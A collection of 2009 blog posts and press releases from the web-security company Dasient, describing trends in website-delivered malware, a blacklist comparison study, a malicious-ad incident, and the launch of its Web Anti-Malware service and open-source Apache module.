Dasient details new attack @ Cyber Security East

Late last week I gave a talk at the Cyber Security East Conference in Washington, DC. Some of the other speakers included Robert Lentz (Deputy Assistant Secretary of Defense), Dr. Eric Cole (Chief Scientist of Lockheed Martin), and Robert Carey (Chief Information Officer, Department of the Navy). There was a lot of interesting and useful discussion, and I was glad to be able to contribute to the event.

In my talk, I reviewed the fundamental shift we've seen in the way malware is spreading, focusing on the 600% increase in web-based malware in the last two years. These attacks -- in which legitimate sites are compromised and turned into delivery vehicles for malware -- are impacting more than a million webpages per month, and in turn more and more legitimate sites are being blacklisted by major search engines, browsers, and AV companies.

I also shared a few examples of how web-based malware attacks are growing more sophisticated, based on data we've gathered in the last year using our proprietary malware analysis platform. As you may know, some web-based malware attacks can be attributed to a single injection of an iFrame or JavaScript code snippet, with a relatively obvious malicious domain in the SRC of the iFrame. Others employ heavily obfuscated JavaScript that can often be hundreds of characters long, and as such can be more difficult to spot or remove from an infected site -- but they still use a single injection point.

We are now starting to see attackers insert code via multiple injection points, to further obfuscate the bad code and make it more difficult for webmasters and traditional scans to detect. In the screen below is an example of this kind of attack that I presented last week:

Note that the attacker has injected JavaScript here, but it is not obfuscated, and it doesn't appear to point to a malicious domain. Hence, anyone who does a simple check for malicious domains may be easily fooled into thinking that the JavaScript is innocuous. The reality is quite different: The call to "getElementById" in the JavaScript reaches into another part of the document (where the first injection took place) to retrieve and clarify the malicious domain. Once the domain is decoded (in the second injection), the attacker's domain is revealed to be the source of a malicious iFrame.

This new attack makes it clear that the purveyors of web-based malware are actively looking for ways around malware scans, and it underlines the importance of going above and beyond signature-based analysis in the battle against this threat. For example, the Dasient WAM malware-analysis platform was able to proactively capture this new multiple-injection attack in no small part because of its strengths in behavioral analysis. We believe that as the web becomes more sophisticated and as attackers continue to embrace new, increasingly automated attack vectors, businesses on the web will need to deploy protections that work at web speed and web scale to keep themselves safe.

To learn more about how Dasient WAM can help you protect your site, check out our product overview.

Dasient @ HostingCon 2009

Readers of this blog will know that the Dasient team was at HostingCon 2009 in Washington DC last week. The show was great -- busy, but very engaging. We had a booth in the exhibit hall, and hosted a party for some of the show's attendees. Neil gave a talk on the rising threat of web-based malware in the "Emerging Trends" track, and we launched a new open source tool called Mod Anti-Malware Lite to help web hosts, site owners, and developers protect themselves. We were also named one of the five "must see" companies at the show by Web Host Magazine.

But, without question, the most rewarding part of the experience was the opportunity to interact with so many people from the web hosting community. We learned a lot about the challenges that web hosts of all sizes are facing on the security front, and talked to several companies whose customers had been infected with web-based malware and / or blacklisted in recent months (one company had seen more than a quarter of its domains infected by Gumblar). We also got a lot of great feedback on Dasient WAM and the ways it's helping hosts address these threats.

For those of you we missed at the show, be sure to check out our new partner center, where you can sign your customer domains up for free blacklist monitoring, download Mod Anti-Malware Lite, and more. And for the rest of you, check out our pics from the event below!

Dasient launches Web Anti-Malware Lite

The Dasient team is at HostingCon 2009 this week, and today we've made a few announcements that we're really excited about. Here's an excerpt from the release we put out this morning:

Dasient Releases Free Open-Source Web Anti-Malware Technology

Test version of Dasient WAM remediation technology enables site owners and web hosts to keep their sites from infecting users in the event of a malware infection

Dasient also launches partner center and announces new distribution partnerships with web hosting providers

WASHINGTON DC - August 11, 2009 - Today at HostingCon 2009, Dasient launched Mod Anti-Malware Lite, an open source version of its Web Anti-Malware (WAM) remediation technology. Mod Anti-Malware Lite is an Apache server module that will help site owners, web hosts, and developers protect themselves against the effects of web-based attacks that can compromise their sites and spread malware to their users. Mod Anti-Malware Lite will be made available today at www.dasient.com/partners and www.sourceforge.net.

"Every day, thousands of legitimate websites are infected with malicious code, and the speed, scale, and complexity of these attacks makes it difficult for website owners to identify and address the resulting infections," said Dr. Neil Daswani, one of Dasient's three co-founders. "Now more than ever it's important for site owners to deploy defenses that can operate at the scale and speed required to deal with the problem."

The most immediate result of web malware infection is blacklisting by search engines like Google and Yahoo; browsers like Internet Explorer, Firefox, and Chrome; and desktop anti-virus providers like Norton and McAfee. Using Dasient's Web-Anti Malware service can help sites stay off these blacklists, all of which can have a significant impact on site traffic, reputation, and revenue. Dasient WAM is the only web anti-malware service on the market that can monitor, automatically identify, and quarantine malware on websites before it can infect visitors and cause a loss of traffic, reputation, and revenue.

Dasient is making Mod Anti-Malware Lite available as open source so that web hosts, site owners, and developers can test the Dasient WAM technology on their sites and explore different uses of the technology. When used in conjunction with the Dasient WAM monitoring and diagnostic service, the module will prevent any page that's been infected with malware from being served to users. Anyone who downloads and installs Mod Anti-Malware Lite will be granted a limited free trial of the Dasient WAM monitoring and diagnostic service, to be used in conjunction with the module.

Compared with the technology offered in Mod Anti-Malware Lite, the remediation technology in the premium service takes things a step further, removing any dangerous code but still serving the rest of the page to users, so site owners both protect their users from infection and stay open for business.

Also today, Dasient is launching a new partner center at www.dasient.com/partners. The partner center is designed to be a resource for web hosting providers, enabling them to quickly and easily sign their customer domains up for free blacklist monitoring, download Mod Anti-Malware Lite, and more.

Dasient is also happy to announce new distribution partnerships with five web hosting providers: Consolidated, Vexxhost, Ultrahosting, and Nerds on Site in North America and Diadem Technologies in India. These partners will be integrating Dasient WAM into their product platforms in the coming months, selling the product to their customers and sharing revenue with Dasient.

If you'd like to learn more about the Dasient WAM service, check out our product overview. If you'd like to download Mod Anti-Malware Lite and get started right away, head over to the new partner center.

And if you're at the show, be sure to catch the session by our own Neil Daswani at 4:00 pm today in the "Emerging Trends" track at the conference. Neil will be discussing the rising threat of web-based malware, and what web hosts of all sizes can do to protect themselves and their customers. Also be sure to swing by our booth for a demo of the Dasient WAM technology or to sign up for free blacklist monitoring in our new partner center. We're in booth 312 -- see you there!

Dasient Co-Founder Neil Daswani Gives Talk At Google

Last week, Neil was invited by Google engineer David Turner to give a talk at Google on "Mitigating Web-Based Malware Attacks." In the talk, Neil discussed the problem of web-based malware, and the ways we can all work together as a community to address it. The full video of the talk has been posted on YouTube:



Enjoy!

How does a web page harm thee? Let me count the ways....

As the web grows and diversifies, so do the number of ways in which web pages can harm users (for example). To help counter this threat, Google, Norton, and McAfee maintain "blacklists" that warn users away from potentially unsafe webpages. But what exactly does it mean to get blacklisted by these services? Do the lists agree on which sites are harmful?

When analyzing a blacklist, the primary fact to keep in mind is that the term "bad" is not well defined. As such, each list operates under different criteria. Google, for example, focuses on technical threats such as drive-by downloads. McAfee and Norton take a broader view, and will flag a site based on things like "annoyance factors" or "excessive popups." McAfee also signs up for any mailing lists it finds and records the amount of spam generated. Google limits itself to a binary response marking a site as potentially harmful (e.g., "This site may harm your computer") or not, while McAfee and Norton label websites as "Safe," "Caution," "Warning," or "Untested."

Given these divergent criteria, the first thing that is immediately apparent is that it would be much too simplistic to call all blacklisted sites "malicious," while calling all non-blacklisted sites "safe." To see how similar or different these blacklists are in practice, we took a set of relatively popular domains on the Internet and queried all three lists.

Of the sites that were flagged by at least one of the blacklists:

• 57% were marked as potentially harmful or "Warning," with the other 43% marked as "Caution."


• Google flagged 5.2% with a "This site may harm your computer" label.

• Norton flagged 16.3% of the sites with a rating of "Warning," and another 14.4% with a rating of "Caution."


• McAfee flagged 38.6% of the sites with a rating of "Warning," and another 32% with a rating of "Caution."

Per the statistics above, Google's list was by far the smallest, reflecting its focus on technical threats. Norton had far more "untested" sites than McAfee, partially explaining Norton's lower numbers.

When we compare which sites were blacklisted, however, the results become far more interesting. Of the sites that Google blacklisted:

• Norton labeled less than half with "Warning," half with "Safe," and the remaining ones as "Untested." None were labled with "Caution."


• McAfee labeled a quarter with "Warning," a quarter were "Untested," and the remaining half were safe. None were labled with "Caution."

• McAfee's users lodged complaints about more than half of the sites.

Norton and McAfee's blacklists also didn't agree with each other often. Of the sites flagged between them, only 4% were on both lists. Amazingly, the overlap between all three lists was less than 1%.

Of the sites flagged "Warning" or "Harmful" by at least one list, 61%
were flagged only by McAfee. Only 1% were flagged by all three lists.

These discrepancies shouldn't be surprising, given the fact that the lists employ different criteria and techniques for evaluating sites. But there are also deeper reasons for the lack of overlap: For one thing, the frequency and timing of testing can have a significant impact on the rating a site receives -- if a site is compromised after it's tested by a service, and that service doesn't test it again for another day, week, or even month, that site could end up infecting a significant number of its users while still being marked as "safe" by the service. For another, the diagnostics employed by these services aren't necessarily infallible -- web-based malware is sometimes masked to prevent its detection by some testing services.

So what does all this mean for protecting your business? How should you deal with the fact that there are so many blacklists out there, testing your site on several different criteria and with varying levels of effectiveness? At Dasient, we believe the answer is being proactive about monitoring and protecting your site from web-based malware. To learn how we can help you do that, click http://wam.dasient.com.

Attackers infect websites via ad networks, widgets

According to reports on Twitter as well as on ZDNet over the weekend, visitors to several high-profile websites were blocked from accessing parts of the sites because an advertising partner, Eyewonder, suffered a malware attack.



Malicious advertisements are increasingly being used by attackers as a vector for distributing malware via legitimate sites. In this case, what happens is that the malicious code that the website ends up serving to users is being sourced in from an advertising partner. The website itself has not been compromised by attackers -- rather, the ad network used by the site has been compromised. Attackers often use malicious ads to achieve scale and avoid detection. It would have been difficult for the attackers to infect a large number of high-profile websites directly; instead, they were able to leverage the trusted relationship between the websites and their ad network to get malicious content (in this case an ad) served to the sites' end users. In some cases, Dasient has added certain ad networks to its internal blacklist to inform its customers where there is a risk that ads may result in infecting their users.

In addition to malware coming in through ads, we have also seen cases where malicious code comes into a website via content mash-ups or third-party widgets. For example, third-party widgets such as traffic counters have been used to infect websites (see section 4.4 of "The Ghost in the Browser"). We have spoken to website owners who explained that their sites were infected not through attackers exploiting a vulnerability in the website, but because they included a plug-in or widget that ended up being malicious. In some cases, the widget is benign for a period of time (even years), but then drastically changes behavior to become malicious (either because the widget provider was itself malicious or, more likely, because the widget provider's servers were hacked).

Attackers will continue to find network and web application vulnerabilities in websites that they can exploit to directly plant malicious code. However, it is clear from the Eyewonder incident that the attackers will also seek ways of exploiting the trusted relationships between websites and their third-party advertising or content partners to create the same effect. The nature of the open web encourages websites to mash up best-of-breed content (and ads) from various sources. To reduce risk, it is important for websites to perform due diligence on all third-party content and ad providers, as well as employ automated detection and remediation services.

Introducing Dasient Web Anti-Malware (WAM)

posted by Neil Daswani, Ameet Ranadive, and Shariq Rizvi,
Co-Founders, Dasient

If you've been following our blog, you'll know that we've been talking quite a bit about the latest security threats on the web. One of the threats we've been focusing on specifically is web-based malware. This kind of attack -- in which hackers compromise a legitimate site and turn it into a delivery vehicle for drive-by malware downloads -- has long been regarded as an emerging threat.

But one look at the numbers makes it clear that this threat has officially arrived: In the last two years, there's been a 600% increase in the number of malware-infected webpages, and 80% of those pages are legitimate. Google first reported the problem of malware-infected pages exploding from April 2007 to January 2008. Microsoft estimated in an April 2009 report that the total number of legitimate webpages being compromised per month is more than 1 million. And now that search engines like Google and Yahoo; browsers like IE8, Firefox, and Chrome; and desktop AV providers like Norton and McAfee are blacklisting compromised sites, those sites are seeing double-digit losses in traffic and revenue and taking significant hits to their reputation.

Those are just some of the reasons we're proud to be opening up our Dasient Web Anti-Malware service to a broader audience today. Dasient Web Anti-Malware -- or "WAM," as we like to call it -- is the world's first complete anti-malware solution for websites. Dasient WAM monitors, automatically identifies, and quarantines malware on websites, before those sites suffer significant losses in traffic, revenue, and reputation.

We're making the monitoring and diagnostic elements of WAM openly available in public beta today, and making the quarantining element available in private beta. WAM is available both to site owners and to web hosting providers interested in offering their customers protection against web-based malware. If you want to learn more, jump down to the full text of our news release, which we've included below. If you're ready to get started right away, head here to sign up for free blacklist monitoring for your site.

We're excited to be bringing these necessary protections to the web, and are looking forward to your feedback. Stay tuned to this space for more news on Dasient WAM and further insights on the development of new web-based threats.

Here is the press release:

Dasient Introduces First Web Anti-Malware Service

Addresses Growing Need for Protection From New Web-Based Attacks

PALO ALTO, June 16, 2009 – Dasient today introduced the industry's first service to protect companies against a fast-growing class of web-based attacks that compromise legitimate websites and then use them to spread malware to the sites' visitors. Dasient's new Web Anti-Malware (WAM) service continually monitors websites, diagnoses any infections, and helps businesses address the infections, before the sites suffer significant losses in traffic, revenue, and reputation.

"In the last two years, we've seen a fundamental shift in the way malware is spread," said Dasient co-founder Dr. Neil Daswani. "Hackers are using highly automated and mutable attacks to turn websites into delivery vehicles for malicious software. This is a web problem at its core, and it requires a solution that can function at web speed and web scale. That's exactly what we had in mind when we designed the Dasient WAM service."

Sharp Increase in Malware-Infected Webpages

Each day, thousands of legitimate websites are infected with malicious code, often without their knowledge. The speed, scale, and complexity of these attacks makes it extremely difficult for website owners to identify and fix the resulting infections, and in some cases to even know they've occurred.

The most immediate result of web malware infection is blacklisting by search engines like Google and Yahoo; browsers like Internet Explorer, Firefox, and Chrome; and desktop anti-virus providers like Norton and McAfee. When blacklisted, a website's visitors are redirected to a warning that the site they're about to visit might be dangerous. In many cases, being blacklisted causes a sharp drop in traffic to the site, depriving the site owner of advertising or e-commerce revenue, damaging the site's brand, and spurring additional support costs.

Dasient Identifies and Contains Malware That Can Infect Site Visitors

Today Dasient is announcing the following updates to its patent-pending Web Anti-Malware service, which has been in alpha testing with thousands of websites since early this year:

• Free Blacklist Monitoring: Regularly monitors blacklists from search engines, browsers, and desktop anti-virus companies and provides customers with instant alerts if they've been flagged by those providers. The WAM Blacklist Monitoring service is now in public beta, and is available for free to direct customers and web hosting providers.
  
  
  
• Premium Monitoring and Diagnosis: Continuously monitors customer websites for malicious code that can be distributed by web applications, user-generated content, third-party widgets, advertisements, and other vulnerable site elements. When an infection is identified, customers are notified and provided with detailed diagnostic information, including all malicious source code and infected URLs. The WAM Premium Monitoring service is now in public beta, and is available on a subscription basis to direct customers and web hosting providers.
  
  
  
• Quarantining: Used in conjunction with the Premium Monitoring service, Dasient's quarantining technology automatically contains infections as soon as they're diagnosed, serving the webpages in question but not the malicious code. Quarantining prevents the site from spreading malware broadly to its visitors and keeps it from being flagged by blacklist providers. The WAM Quarantining service is now in private beta, and direct customers and web hosting providers can sign up to join the beta on the Dasient site.
  
  

The Dasient WAM monitoring and diagnostic services are built on a set of behavioral analysis technologies that continually crawl customer sites and the web, identifying new web-based malware infections. The monitoring and diagnostic tools are provided to customers as a web service, and the quarantining technology is made available as a web server module that can be installed by customers or web hosting providers.

More information about the Dasient WAM service and pricing can be found at www.dasient.com.

About Dasient

Dasient is an Internet security company that protects businesses from web-based malware attacks. It is the first to develop a complete Web Anti-Malware service that can monitor, automatically identify, and quarantine malware on websites before it can infect visitors and cause a loss of traffic, reputation, and revenue. Dasient was founded by former Google engineers Neil Daswani and Shariq Rizvi and former McKinsey strategy consultant Ameet Ranadive. They are backed by a group of seed investors who also invested in VeriSign, Citrix, Twitter, Digg, Tumbleweed, Finjan, and more. More information about Dasient can be found at www.dasient.com.